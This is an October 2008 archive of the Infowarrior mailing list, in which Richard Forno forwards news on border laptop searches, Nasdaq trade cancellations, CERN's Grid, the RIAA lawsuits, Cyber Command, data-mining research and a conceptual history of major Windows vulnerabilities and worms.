From rforno at infowarrior.org Wed Oct 1 04:02:56 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 1 Oct 2008 00:02:56 -0400
Subject: [Infowarrior] - Bill would limit Homeland Security laptop searches
Message-ID:

September 30, 2008 3:35 PM PDT
Bill would limit Homeland Security laptop searches
Posted by Stephanie Condon
http://news.cnet.com/8301-13578_3-10055020-38.html?part=rss&subj=news&tag=2547-1_3-0-20

The Homeland Security Department has declared its right to seize laptops at the U.S. border indefinitely, but legislation introduced Thursday is intended to curb that power.

U.S. Sens. Russ Feingold (D-Wis.), Maria Cantwell (D-Wash.), and Rep. Adam Smith (D-Wash.) introduced the Travelers Privacy Protection Act in response to the DHS policy allowing customs agents to detain a traveler's laptop for an unspecified period of time to review its contents, even absent individualized suspicion.

"Most Americans would be shocked to learn that upon their return to the U.S. from traveling abroad, the government could demand the password to their laptop, hold it for as long as it wants, pore over their documents, e-mails, and photographs, and examine which Web sites they visited--all without any suggestion of wrongdoing," Feingold said. "Focusing our limited law enforcement resources on law-abiding Americans who present no basis for suspicion does not make us any safer and is a gross violation of privacy."

The legislation would require DHS to form reasonable suspicion of illegal activity before searching electronic devices carried by U.S. residents. The DHS would also be required to provide probable cause and a warrant or court order to hold such a device for more than 24 hours.

The bill also limits what information acquired through electronic searches the DHS can disclose, and it requires the department to report on its border searches to Congress.
The DHS refused to send a witness to a Senate hearing in June, chaired by Feingold, regarding searches of electronic devices, but it provided a written statement defending its policy. A ruling in April by the Ninth Circuit Court of Appeals also defended the agency's right to conduct the searches without reasonable suspicion.

Similar bills, such as the Securing Our Borders and Our Data Act and the Border Security Search Accountability Act, have been introduced this year in the House.

From rforno at infowarrior.org Wed Oct 1 04:08:32 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 1 Oct 2008 00:08:32 -0400
Subject: [Infowarrior] - NASDAQ: Some Google, Rohm & Haas Trades Canceled
Message-ID: <1989B567-78C6-4DC5-A565-1FDF2A64070B@infowarrior.org>

Interesting..... --rf

Some Google, Rohm & Haas Trades Canceled, Nasdaq Says (Update2)
By Lynn Thomasson
http://www.bloomberg.com/apps/news?pid=newsarchive&sid=a8SoUM1aLCzs

Sept. 30 (Bloomberg) -- Some Google Inc. and Rohm & Haas Co. trades that occurred around 4 p.m. today will be canceled, the Nasdaq Stock Market said.

Trades of Google shares above $425.29 or below $400.52 that were executed between 3:57 p.m. and 4:02 p.m. New York time today will be broken, Nasdaq's regulatory arm said on its Web site. Rohm & Haas trades above $73.20 or below $68.93 during the same time period also will be canceled.

"Participants should review their trading activity for potentially erroneous trades outside the above referenced times," Nasdaq said.

Google, owner of the world's most popular search engine, fell as low as $200 at 4 p.m. Rohm & Haas, a chemicals producer, climbed to $100,000 moments before U.S. exchanges closed.

Google's closing price will be adjusted to $400.52, Nasdaq said. That will shift the Nasdaq-100 Index to 1,594.63, a 6.6 percent advance for the day, according to the Web site. The index previously was listed as closing at 1,584.60.
"It's disturbing to watch the number of these things and there seem to be more and more," said Laszlo Birinyi, who oversees more than $350 million as president of Birinyi Associates Inc. in Westport, Connecticut. "We're watching trades more closely."

To contact the reporter on this story: Lynn Thomasson in New York at lthomasson at bloomberg.net.
Last Updated: September 30, 2008 19:06 EDT

From rforno at infowarrior.org Wed Oct 1 04:27:10 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 1 Oct 2008 00:27:10 -0400
Subject: [Infowarrior] - Grid of 100,000 computers heralds new internet dawn
Message-ID: <48FE6098-66B6-49B0-8E96-05429659D8C7@infowarrior.org>

(Skynet, anyone? -rf)

September 29, 2008
Grid of 100,000 computers heralds new internet dawn
http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article4842964.ece

A network of supercomputers called the Grid will allow information to be downloaded quicker than ever. Tasks that took hours will now take seconds

Murad Ahmed, Technology Reporter

A network of 100,000 computers providing the greatest data processing capacity yet unleashed has been created to cope with information pouring from the world's largest machine.

The Grid is the latest evolution of the internet and the world wide web and computer scientists will announce on Friday that it is ready to be connected to the Large Hadron Collider (LHC). It is designed for schemes where huge quantities of data need crunching, such as large research and engineering projects.

The Grid has the kind of power required to download movies in seconds, and the ability to make high-definition video phone calls for the same price as a local call. More importantly, it should help to narrow the search for cures for diseases. However, it is unlikely to be directly available to most internet users until telecoms providers build the fibre-optic network required to use it.
The Grid allows scientists at CERN, the European Organisation for Nuclear Research, to get access to the unemployed processing power of thousands of computers in 33 countries to deal with the data created by the LHC.

Scientists at CERN, where the world wide web was invented, created the £500 million Grid because they realised that a single computer would not be able to cope with the amount of data the LHC is expected to produce each year: 15 petabytes, or 15 million gigabytes, which would fill 20 million CDs.

They said that it was an extra facility laid on top of the internet, which originally linked computers around the world in the Seventies.

Dr Bob Jones, a CERN scientist, said: "The [world wide] web allows you to access information on other computers. What the Grid allows you to do is not only access the information, but make use of their computing resources and power."

He likened it to the National Grid. Users would be able to tap into massive amounts of processing power, but the source of the power would change, depending on availability.

Processing tasks will be distributed between 11 gateway computer centres in ten countries, including Britain, which will share them out between more than 140 sites.

One of the first jobs the Grid will tackle is handling the raw data for CERN's experiments into finding proof of the Higgs boson, the so-called God particle.
Its uses, however, extend well beyond particle physics and it has already been used on a smaller scale in research into diseases such as malaria and bird flu.

"The Grid cannot find a cure for cancer, but what it can do is make it quicker," said Dr Jones, explaining that what might have taken a decade could now be done in weeks.

David Britton, Professor of Physics at Glasgow University and a leading figure in the Grid project, said: "The old traditional way to find cures for diseases is that you would go to the lab and try mixing various drugs and see how they work."

With the Grid, he said, scientists could run hundreds of thousands of simulations to create a shortlist of the drugs that are most likely to offer the potential for a cure. Researchers can then get to work testing the drugs singled out as promising.

The Grid has also already been used to save lives in the immediate aftermath of earthquakes. Using the seismic data, scientists can use the Grid for simulations that pinpoint which areas are most affected, allowing rescue teams to direct their efforts where they are most needed.

Many believe the world wide web and the internet are the same thing, but the internet is actually a massive network of networks, which connects millions of computers together globally, and the web is an information-sharing model built on top of the internet, which allows information to be accessed over the medium of the internet.

From rforno at infowarrior.org Wed Oct 1 12:53:14 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 1 Oct 2008 08:53:14 -0400
Subject: [Infowarrior] - Grenades as WMDs ... Schneier disagrees, so do I
Message-ID: <151BDC58-11EC-4BC6-8E1D-4F7DADE95346@infowarrior.org>

http://www.schneier.com/blog/archives/2008/10/hand_grenades_a.html

Hand Grenades as Weapons of Mass Destruction

I get that this is terrorism:

> A 24-year-old convert to Islam has been sentenced to 35 years in prison for plotting to set off hand grenades in a crowded shopping mall during the Christmas season.

But I thought "weapons of mass destruction" was reserved for nuclear, chemical, and biological weapons.

> He was arrested in 2006 on charges of scheming to use weapons of mass destruction at the Cherryvale Mall in the northern Illinois city of Rockford.

Like the continuing cheapening of the word "terrorism," we are now cheapening the term "weapons of mass destruction."

From rforno at infowarrior.org Wed Oct 1 22:18:52 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 1 Oct 2008 18:18:52 -0400
Subject: [Infowarrior] - Bailout bill includes tax break on an ARROW company?!?
Message-ID:

....and then we start seeing stuff like this embedded in the bill. I would be surprised if the House rejects the bill unless it's clean and doesn't include all these little pet projects for niche constituencies. But this is Congress being Congress. :( --rf

According to Politico (source: http://www.politico.com/news/stories/1008/14161.html):

"With each permutation, the bill has steadily grown in size. Treasury's initial plan was about three pages long. The House version, which failed, stretched to 110. The Senate substitute now runs over 450 pages. And tucked away in the tax provisions is a landmark health care provision demanding that insurance companies provide coverage for mental health treatment, such as hospitalization, on parity with physical illnesses."

Bailout Bull's-Eye for Kids' Arrow-Makers' Tax Break (Update1)
By Ryan J. Donmoyer

Oct. 1 (Bloomberg) -- Rose City Archery Inc., an Oregon company that makes arrows used by children, hit a bull's-eye with Senate legislation that would rescue Wall Street banks.

Senators attached a provision repealing a 39-cent excise tax on wooden arrows designed for children to an historic $700 billion bank rescue that is likely to pass tonight.

The provision, originally proposed by Oregon senators Ron Wyden and Gordon Smith, will save manufacturers such as Rose City Archery in Myrtle Point, Oregon, about $200,000 a year.

It's one of dozens of tax breaks benefiting Hollywood producers, stock-car racetrack owners and Virgin Islands rum-makers included in the broader legislation in an effort to win support from House Republicans, whose defection contributed to a rejection of an earlier version of the legislation two days ago on a 228-205 vote.

< - >

http://www.bloomberg.com/apps/news?pid=20601103&sid=aKd0vyGN8L2k&refer=us

From rforno at infowarrior.org Thu Oct 2 19:02:12 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 2 Oct 2008 15:02:12 -0400
Subject: [Infowarrior] - Fwd: Skype and China
References: <67858FF591FD524FBE16011177C09E96014CD267@ausx3mpc101.aus.amer.dell.com>
Message-ID: <11B58CC7-8569-405E-83EB-5E6C726ADDE6@infowarrior.org>

Begin forwarded message:

> From: Ken
> Date: October 2, 2008 1:21:18 PM EDT
> Subject: Skype and China
>
> Seems that some research group found out or discovered that a system
> is in place to track skype messages.
>
> http://www.nytimes.com/2008/10/02/technology/internet/02skype.html?ref=technology

From rforno at infowarrior.org Fri Oct 3 12:11:46 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 3 Oct 2008 08:11:46 -0400
Subject: [Infowarrior] - Music industry backs down over Itunes closure threat
Message-ID: <96E557AA-202D-43A0-871B-5785FFB40121@infowarrior.org>

Music industry backs down over Itunes closure threat
The price is right...
for the next five years
By Emma Hughes: Friday, 03 October 2008, 10:59 AM
http://www.theinquirer.net/gb/inquirer/news/2008/10/03/itunes-close

APPLE'S THREAT to close down Itunes seems to have done the trick in getting the Copyright Royalty Board to keep the price of royalties paid to record companies for downloaded music at 9 cents a song.

The Cupertino company threatened to close down the incredibly successful music marketplace if the decision went through to up the price of downloading songs from nine cents to 15, a 66 per cent price hike.

So, The National Music Publishers Association, which has been pushing for the rise in royalties for 18 months seems to have backed down, no doubt realising that, without the huge amounts of wonga put its way by Apple fans would leave it rather impoverished.

An Apple representative said, "We're pleased with the CRB's decision."

The CRB achieved a hollow victory by getting a proposed cut in the rate to 4.8 cents proposed by some vendors, coming to an agreement of 9.1 cents a song for at least five years.

We can't help but wonder how much cash went into the lawyers pockets over this whole shambles.

This decision has been pronounced by the NMPA as "a positive development for all songwriters and music publishers" and is the first time royalty rates have been mechanically decided for digital music.

Jonathan Potter of the Digital Music Association, which represents online music stores like Apple said, "Keeping rates where they are will help digital services and retailers continue to innovate and grow for the next several years."

This move doesn't come as much of a surprise, as Apple was highly unlikely to close the store; over the last five years it has sold more than five billion songs online, and that's a whole load of nine cents.

Digital sales figures show that songs and album sales rose by almost 50 percent last year according to the Recording Industry Association of America.
Meanwhile CD sales dropped 20 per cent to $7.4bn (£4bn).

Looks like our predictions were correct. Then again, the chances of Apple killing its cash cow were always pretty slim.

From rforno at infowarrior.org Mon Oct 6 01:30:11 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 5 Oct 2008 21:30:11 -0400
Subject: [Infowarrior] - RIAA v. The People: Five Years Later
Message-ID:

RIAA v. The People: Five Years Later
September, 2008

On September 8, 2003, the recording industry sued 261 American music fans for sharing songs on peer-to-peer (P2P) file sharing networks, kicking off an unprecedented legal campaign against the people that should be the recording industry's best customers: music fans.[1] Five years later, the recording industry has filed, settled, or threatened legal actions against at least 30,000 individuals.[2] These individuals have included children, grandparents, unemployed single mothers, college professors, a random selection from the millions of Americans who have used P2P networks. And there's no end in sight; new lawsuits are filed monthly, and now they are supplemented by a flood of "pre-litigation" settlement letters designed to extract settlements without any need to enter a courtroom.[3]

But suing music fans has proven to be an ineffective response to unauthorized P2P file-sharing. Downloading from P2P networks is more popular than ever, despite the widespread public awareness of lawsuits.[4] And the lawsuit campaign has not resulted in any royalties to artists. One thing has become clear: suing music fans is no answer to the P2P dilemma.
< - >

http://www.eff.org/wp/riaa-v-people-years-later

From rforno at infowarrior.org Mon Oct 6 12:21:56 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 6 Oct 2008 08:21:56 -0400
Subject: [Infowarrior] - Judge halts sales of RealDVD
Message-ID: <84536E27-8E6D-4BB8-B84B-941F6E42B2D8@infowarrior.org>

Judge halts sales of RealDVD (CNET)
Posted on Mon Oct 6, 2008 1:39AM EDT
http://tech.yahoo.com/news/cnet/20081006/tc_cnet/8301102331005857493

A judge has ordered RealNetworks to suspend the sale of RealDVD, the controversial software that hands users the ability to copy and store films to a hard drive, according to a report published by NewTeeVee.com, a technology-news blog.

The film industry sought to prevent sales of RealDVD last week when it filed a lawsuit against RealNetworks. The Motion Picture Association of America accused Real of violating the Digital Millennium Copyright Act and breach of contract.

According to the story on NewTeeVee, the court wants sales to cease until Tuesday, when it has reviewed all the papers involved in the case.

On Sunday evening, the RealDVD site notified visitors that because of the legal action taken by Hollywood, RealDVD was unavailable. "Rest assure we will work diligently to provide you with software that allows you to make a legal copy of your DVDs," the post read.

Representatives from the MPAA and RealNetworks could not be reached Sunday.

From rforno at infowarrior.org Wed Oct 8 02:08:33 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 7 Oct 2008 22:08:33 -0400
Subject: [Infowarrior] - AFCYBER is back again (y/n/abort?)
Message-ID: <72D7FBD1-0B1A-4CAC-A4AF-FF97EAE4E8E7@infowarrior.org>

Air Force pursues Cyber Command again
By Bob Brewin, bbrewin at govexec.com
10/07/08
http://www.nextgov.com/nextgov/ng_20081007_1366.php

Top Air Force leadership has decided to pursue forming Cyber Command to defend Defense Department networks and to launch cyberattacks against foes after putting the project on hold in August.

The service's leadership, including Air Force Secretary Michael Donley and Chief of Staff Gen. Norton Schwartz, made the decision last week at the Corona senior leadership conference in Colorado Springs, Colo., to continue its effort to stand up the command, said Capt. Michael Andrews, an Air Force spokesman.

The service put Cyber Command on hold in August, saying it wanted to delay the program until new senior Air Force leaders, including Schwartz, had time to make a final decision on the scope and mission of the command.

Last month, sources said the Pentagon decided that the U.S. Strategic Command in Omaha, Neb., should create and run a joint Cyber Command, a move that seemingly dashed any hopes the Air Force had to own Defense's cyber responsibilities.

In May, Deputy Secretary of Defense Gordon England wrote in a memo, "Because all the combatant commands, military departments and other defense components need the ability to work unhindered in cyberspace, the domain does not fall within the purview of any particular department or component."

The service originally had decided to establish the Cyber Command as a separate unit within Air Force Space Command, and during the Corona conference, leadership "discussed how the Air Force will continue to develop capabilities in this new domain and train personnel to execute this new mission."

"The conduct of cyber operations is a complex issue, as [Defense] and other interagency partners have substantial equity in the cyber arena," Donley said.
"We will continue to do our part to increase Air Force cyber capabilities and institutionalize our cyber mission."

Andrews said the Air Force will provide more details on the Cyber Command later in October after discussions with Pentagon and congressional leadership.

From rforno at infowarrior.org Wed Oct 8 02:09:34 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 7 Oct 2008 22:09:34 -0400
Subject: [Infowarrior] - USG Report: Terrorist data mining doesn't work well
Message-ID: <825A8330-233F-4E27-92C6-C743E0097F4B@infowarrior.org>

http://news.cnet.com/8301-13578_3-10059987-38.html?part=rss&subj=news&tag=2547-1_3-0-20

October 7, 2008 9:30 AM PDT
Government report: Data mining doesn't work well
Posted by Declan McCullagh

The most extensive government report to date on whether terrorists can be identified through data mining has yielded an important conclusion: It doesn't really work.

A National Research Council report, years in the making and scheduled to be released Tuesday, concludes that automated identification of terrorists through data mining or any other mechanism "is neither feasible as an objective nor desirable as a goal of technology development efforts." Inevitable false positives will result in "ordinary, law-abiding citizens and businesses" being incorrectly flagged as suspects.

The whopping 352-page report, called "Protecting Individual Privacy in the Struggle Against Terrorists," amounts to at least a partial repudiation of the Defense Department's controversial data-mining program called Total Information Awareness, which was limited by Congress in 2003. But the ambition of the report's authors is far broader than just revisiting the problems of the TIA program and its successors.
Instead, they aim to produce a scholarly evaluation of the current technologies that exist for data mining, their effectiveness, and how government agencies should use them to limit false positives--of the sort that can result in situations like heavily-armed SWAT teams raiding someone's home and shooting their dogs based on the false belief that they were part of a drug ring.

The report was written by a committee whose members include William Perry, a professor at Stanford University; Charles Vest, the former president of MIT; W. Earl Boebert, a retired senior scientist at Sandia National Laboratories; Cynthia Dwork of Microsoft Research; R. Gil Kerlikowske, Seattle's police chief; and Daryl Pregibon, a research scientist at Google.

They admit that far more Americans live their lives online, using everything from VoIP phones to Facebook to RFID tags in automobiles, than a decade ago, and the databases created by those activities are tempting targets for federal agencies. And they draw a distinction between subject-based data mining (starting with one individual and looking for connections) compared with pattern-based data mining (looking for anomalous activities that could show illegal activities).

But the authors conclude the type of data mining that government bureaucrats would like to do--perhaps inspired by watching too many episodes of the Fox series 24--can't work. "If it were possible to automatically find the digital tracks of terrorists and automatically monitor only the communications of terrorists, public policy choices in this domain would be much simpler. But it is not possible to do so."

A summary of the recommendations:

* U.S. government agencies should be required to follow a systematic process to evaluate the effectiveness, lawfulness, and consistency with U.S. values of every information-based program, whether classified or unclassified, for detecting and countering terrorists before it can be deployed, and periodically thereafter.
* Periodically after a program has been operationally deployed, and in particular before a program enters a new phase in its life cycle, policy makers should (carefully review) the program before allowing it to continue operations or to proceed to the next phase.

* To protect the privacy of innocent people, the research and development of any information-based counterterrorism program should be conducted with synthetic population data... At all stages of a phased deployment, data about individuals should be rigorously subjected to the full safeguards of the framework.

* Any information-based counterterrorism program of the U.S. government should be subjected to robust, independent oversight of the operations of that program, a part of which would entail a practice of using the same data mining technologies to "mine the miners and track the trackers."

* Counterterrorism programs should provide meaningful redress to any individuals inappropriately harmed by their operation.

* The U.S. government should periodically review the nation's laws, policies, and procedures that protect individuals' private information for relevance and effectiveness in light of changing technologies and circumstances. In particular, Congress should re-examine existing law to consider how privacy should be protected in the context of information-based programs (e.g., data mining) for counterterrorism.

By itself, of course, this is merely a report with non-binding recommendations that Congress and the executive branch could ignore. But NRC reports are not radical treatises written by an advocacy group; they tend to represent a working consensus of technologists and lawyers.

The great encryption debate of the 1990s was one example. The NRC's so-called CRISIS report on encryption in 1996 concluded export controls--that treated software like Web browsers and PGP as munitions--were a failure and should be relaxed. That eventually happened two years later.
From rforno at infowarrior.org Wed Oct 8 02:10:42 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 7 Oct 2008 22:10:42 -0400
Subject: [Infowarrior] - Worst Windows flaws of the past decade
Message-ID:

Worst Windows flaws of the past decade
The exploits and oversights that left Redmond with egg on its face
http://www.infoworld.com/archives/emailPrint.jsp?R=printThis&A=/article/08/10/06/41FE-windows-flaws_1.html
By Andrew Brandt, IDG News Service
October 06, 2008

June 25, 1998, and June 30, 2008, marked two important milestones in Microsoft's evolution of the Windows OS -- the passing of the torch from Windows 95 to Windows 98, and the less seemly transition from XP to Vista. In the 3,659 days between, users of Windows have been forced to bear witness to another evolution of sorts: bugs that left Windows open to exploits that appeared almost as fast as you could say, "On the Origin of Species."

Uncovering -- and exploiting -- Windows vulnerabilities has made sport for many and careers for many more. Entire industries have sprung up to protect Windows users from previously unknown flaws, while malware authors have matured their practices from juvenile pranks to moneymaking criminal enterprises.

Caught in the middle of this never-ending onslaught is the innocent PC user and the besieged IT admin -- you. And though Microsoft and the entire software industry have labored tirelessly to handle zero-day exploits and to develop protocols for reporting potential security problems, we've seen and experienced several colossal security meltdowns thanks to the humble Windows bug. These errors, buried in millions of lines of code, have steered great corporations and turned the tide of fortunes. It's high time they got the credit they deserve.
Here are the worst Windows flaws we've endured since the introduction of Windows 98.

Password "password" would have been more secure

Bug identifier: CVE-2000-0979, MS00-072
Description: Share Level Password vulnerability
Alias: Windows 9x share password bypass
Date published: Oct. 10, 2000

Windows 9x introduced a nifty little concept wherein users could host a password-protected mini file server, aka a share, on their PCs. The idea was simple: Allow users of networked computers to host and share files securely. Only the padlock Microsoft used to lock the door came equipped with a gaping hole that rendered it useless.

"When processing authentication requests for a NetBIOS share, Windows 95/98 would look at the length of the password sent by the attacker and then only compare that number of bytes to the real password," writes vulnerability expert H.D. Moore, who manages the Metasploit Framework project. Oops.

"This let the attack specify a password of zero bytes and gain access to the share," without actually knowing the password at all, Moore explains. "The real damage," he continues, "was that by trying all characters of incrementing lengths, they could literally obtain the password for share from the server."

Upshot: Rather than functioning as a lock on a door, the password authentication scheme for Windows 95/98's File and Print Sharing acted more like a nail through a hasp -- to open the door you only needed to pull out the nail, with hardly any effort.

Folder traversal: Total server control with a single URL

Bug identifier: MS00-078
Description: Web server folder traversal vulnerability
Alias: Directory traversal bug
Date published: Oct. 17, 2000

If there's one thing we've learned from the past decade of Microsoft patches, it's that not everyone keeps on top of them. When Microsoft published this particular advisory, the patch that fixed the problem (MS00-057) had already been released two months prior.
With this bug, if you knew the layout of a Microsoft file system -- which folders appear where -- you could send a command to a Web server that essentially gave you total control. As anyone who has spent any time using a Windows computer will tell you, it's not hard to find your way around the hard drive. Documents go in a particular folder path; most applications are put in another folder path; and so on.

By using dots and backslashes (or their respective unicode representations) in the URL, this bug allowed you to navigate up and down the file system and execute commands, just by knowing a few simple rules and how Windows organizes itself. While account permissions for IIS are somewhat limited, a related exploit helped escalate privileges, giving remote users the ability to do whatever they wanted to with Windows servers simply by sending a few URLs.

"Originally found as an anonymous post in the PacketStorm forums, this resulted in nearly two straight years of mass ownage against Windows web servers," Moore writes.

Upshot: Directory traversal opened up a new world for automated attacks that merely had to call a particular URL to do their dirty work.

Code Red: Deadly bug, disgusting soda

Bug identifier: MS01-033
Description: Unchecked buffer in index server ISAPI (Internet Server API) extension could enable Web server compromise
Alias: The Code Red bug
Date published: June 18, 2001

What happens when you send a ton of data at a Microsoft Web server? If it was the summer of 2001, well, you owned the network. At least that's what happened a little more than a month after Microsoft released this obscure-sounding patch for IIS Web servers.

The nature of the bug was simple: Take an IIS server, invoke a buffer overflow, and commands spill into other parts of system memory. Because the commands were issued in the context of the system itself, the bug opened up for exploitation virtually all aspects of the server's operation.
And exploitation happened, all right, on a scale that hadn't been seen before. On the afternoon of Friday, July 13, 2001, security engineers at eEye Digital Security received reports of a worm that was spreading rapidly through its customers' networks. Fueled by a limited edition, crimson, caffeinated, high-fructose corn syrup-based beverage, Mark Maiffret and Ryan Permeh spent a weekend reverse-engineering the worm, and alerted the world to its presence.

What the worm did was probe vulnerable IIS servers, infect them, and create 100 threads of itself, which then spread to other computers. If the date was between the 20th of the month and the end of the month, it would attempt to spew data at www.whitehouse.gov. Permeh and Maiffret estimated that the worm could infect approximately 500,000 unique IP addresses per day.

Upshot: Code Red really drove home the importance of patching bugs soon after Microsoft released the patch, because the patches themselves give malware authors clues to exactly where they should look for new vulnerabilities.

Fastest infection. Ever.

Bug identifier: MS02-039
Description: Buffer overruns in SQL Server 2000 Resolution Service could enable remote code execution
Alias: The SQL Slammer bug
Date published: July 24, 2002

While technically not an OS bug, the SQL Slammer bug deserves honorary mention due to the sheer velocity with which vulnerable systems were infected. The bug targeted Microsoft's database server. Vulnerable computers were subject to buffer overflows that, if properly crafted, could place commands into memory to cause the targeted system to execute those commands with the permissions of the database service.

Patching was complicated by the fact that admins needed to run an earlier patch before they could run the MS02-039 fix.

The bug affected primarily corporate server systems, but also affected home users who had MSDE (Microsoft SQL Server Desktop Engine) installed.
That made a number of home users, some of whom didn't even know they had MSDE on their machines, unwitting participants in the carnage to come.

Because the Slammer worm primarily targeted servers running databases, it didn't infect millions of machines. It did, however, spread rapidly -- so rapidly, in fact, that it had infected roughly 9 out of 10 vulnerable machines within 10 minutes of being released on Jan. 25, 2003. The entire worm was only 376 bytes, and fit into a single packet of data.

The MS02-039 bug was "one of the biggest oversights of all time," says Steve Manzuik, senior manager of security research at Juniper Networks, "not because it was an easy or obvious bug to find -- it wasn't."

"At the time of the patch, no one realized that every vulnerable SQL installation was also listening on a UDP (User Datagram Protocol) port that they could be exploited over," Manzuik explains. "Many administrators simply locked down access to the SQL TCP ports while forgetting about UDP."

A postmortem by the Cooperative Association for Internet Data Analysis revealed that the worm was a model of efficiency, doubling the number of infected systems every 8.5 seconds, and flooding the Internet with so many infection attempts that routers shut down. When restarted, so many routers attempted to update their routing tables simultaneously that normal Internet traffic simply couldn't get through the gridlock.

Upshot: SQL Slammer demonstrated the power of a vulnerability that could fit within a single data packet, and brought home the lesson that a single application weakness could cause the entire Internet to grind to a standstill. And it's still out there, drifting around on a few old systems, looking for new hosts to infect.

Billy Gates, stop making money! Make malware instead.
Bug identifier: MS03-026
Description: Buffer overrun in RPC interface could allow code execution
Alias: The Blaster Worm bug
Date published: July 16, 2003

The DCOM RPC interface is a common component of NT-based Windows OSes, including NT, 2000, XP, and Server 2003. In the summer of 2003, it became the subject of intense scrutiny. As Microsoft described in the bulletin that accompanied the patch, a successful exploit only required the attacker to send a "specially formed request" to a vulnerable PC -- a bit like dangling candy in front of a ravenously hungry baby.

By Aug. 11, the Blaster worm arrived, and though it spread rapidly, it was fairly easy to block with a firewall. Unfortunately, protecting home systems with firewalls wasn't common practice at the time. Home users' PCs -- connected directly to the Internet -- got whomped by the worm. When the worm's code crashed the infected computer's RPC service, the computer would display a message warning of imminent shutdown, and unceremoniously reboot itself.

The worm had another message, this one to Microsoft's founder, and embedded within its code: "billy gates why do you make this possible? Stop making money and fix your software!!"

But it was fixed. Or at least it would have been if people had patched their systems. At the end of the summer, Microsoft released a second set of updates in MS03-039 that blocked additional ports that attackers could use to mess with the RPC service.

Upshot: We're all in better shape thanks to the wide adoption of firewalls in the home. Thanks in part to Blaster and its ilk, most broadband modems have one built in.

That sassy bug has a lot of spunk

Bug identifier: CVE-2003-0533, MS04-011
Description: Stack-based overflow in certain Active Directory service functions in LSASRV.DLL
Alias: The Sasser bug
Date published: April 13, 2004

In yet another example of ironic buffer-overflow goodness, this bug made the security subsystem of Windows the agent of evil itself.
And, once again, malicious coders used Microsoft's own patch to figure out exactly where to target the OS. As Windows XP's gatekeeper, LSASS (Local Security Authority Subsystem) manages the permissions of a PC's user accounts. So when eEye -- the same company that discovered the Code Red bug -- quietly disclosed the details of this flaw to Microsoft in October 2003, it touched off six months of furious coding in Redmond that culminated in a patch that fixed 13 other Windows 98, NT, 2000, XP, and Server 2003 flaws, as well as the LSASS bug. And, within 18 days, the Sasser worm was cruising the Internet, hopping from one unpatched machine to another. The poorly coded worm wreaked havoc, shutting down networks around the world. Even though a fix was already available, many users -- in particular, corporate IT managers -- still had not applied MS04-011. By May 1, 2004, work on fixing the unintended damage caused by Sasser had become a round-the-clock operation, says then director of the Microsoft Security Response Center, Kevin Kean, with "a number of war rooms and rotating shifts" for MSRC staffers.

Upshot: What was that about patching as soon as the updates are available? Lessons that should have been learned three years earlier didn't really sink in until Sasser publicly pummeled patchless PCs to pulp.

WMF: Wherein malware is foisted

Bug identifier: CVE-2005-4560, MS06-001
Description: Vulnerability in graphics-rendering engine could allow remote code execution
Alias: Windows Metafile vulnerability, aka drive-by downloads
Date published: Jan. 5, 2006

Over the winter holidays in 2005, security researchers began discussing a newly discovered vulnerability in a Windows library used by the OS to display various kinds of graphics in apps and the OS itself. The problem stemmed from a particular image file format, native to Windows since the days of Windows 3.0, called WMF (Windows Metafile).
Used as the native format for storing graphics within Microsoft Office documents, support for WMF was by that point thoroughly embedded into Microsoft products. WMF files contain function calls that a program sends to the GDI (Graphics Driver Interface). Someone discovered that WMF files can contain executable code as well. This would allow you to, say, create a WMF file that, merely by being viewed, invokes Internet Explorer to visit a particular URL, download a file, and execute that file. Special.

The aftermath of the discovery followed a familiar pattern. Microsoft issued a patch on Jan. 5, 2006, in record time. But for a long while, unpatched computers running vulnerable versions of gdi32.dll roamed the Internet, slurping up mountains of malware.

The bug had far-reaching effects, enabling malicious code to be foisted on unsuspecting users and executed in a variety of ways: previewing an e-mail containing the malicious WMF file in Outlook; viewing an image preview in Explorer; viewing a malicious WMF in certain third-party graphics programs; indexing a hard disk that contained a malicious file; following a URL link in an e-mail, IM, or on another Web page to a site where the malicious file was embedded in the Web page.

Upshot: We learned that nothing is sacred, that any file format could be considered hostile. And we also got a cool new name for an exploit method: drive-by downloads.

MDAC: The component that keeps on giving (headaches)

Bug identifier: CVE-2006-0003, MS06-014
Description: Vulnerability in MDAC (Microsoft Data Access Components) could allow code execution
Alias: MDAC RDS.Dataspace ActiveX bug
Date published: April 11, 2006

Way back in 1998, Microsoft issued a security bulletin about a component of IIS that ran under Windows NT Server called Microsoft Data Access Components. In the bulletin, MS98-004, Microsoft warned that a part of MDAC called the RDS (Remote Data Service) had a vulnerability that allowed unauthorized people to browse databases.
Flash-forward eight years to the spring of 2006. Microsoft released a security bulletin about a component of MDAC called RDS, which has a vulnerability that permits malicious Web servers to perform drive-by downloads against the unpatched PCs of unsuspecting victims. Eerily familiar.

In the later case, it was an ActiveX control that allowed users to connect to RDS through IE and wreak havoc. The ActiveX control doesn't behave as intended, and can be loaded and exploited if you visit the wrong Web site.

Of course, by 2006, MDAC isn't just loaded on servers; you may have it on your PC. Moreover, the bad guys have changed tactics. No longer content to wait patiently for you to happen upon their malicious Web site, they spam you with links, buy ads based on Google searches, and load their pages with SEO (search engine optimization)-rich keywords. The result, however, is the same: Visit and be exploited.

In fact, the bad guys are now using off-the-shelf exploit software to put malware onto your machine. A tool called MPack that's loaded on malicious Web sites can check to see what browser version you're using and what patches you have installed. Based on this analysis, it delivers the exploits that will do the most damage. More galling is that they don't even bother to hide what they're doing, naming the Web page that performs the exploit "mdac4.php."

Upshot: The MDAC RDS is a complex system, with a multitude of patches available depending on which version you have installed. Manually choosing the right patch can be a complicated task. But with such a serious flaw, you can't afford to make a mistake. Patches like these have helped push advancements in Windows Update, which scan your system and pick the right patch automatically, so you don't have to.
From rforno at infowarrior.org Wed Oct 8 02:59:12 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 7 Oct 2008 22:59:12 -0400
Subject: [Infowarrior] - NSA Tokeneer (high-assurance computing)
Message-ID: <46218E86-41F1-4653-8DB3-4C6F4E8E50B6@infowarrior.org>

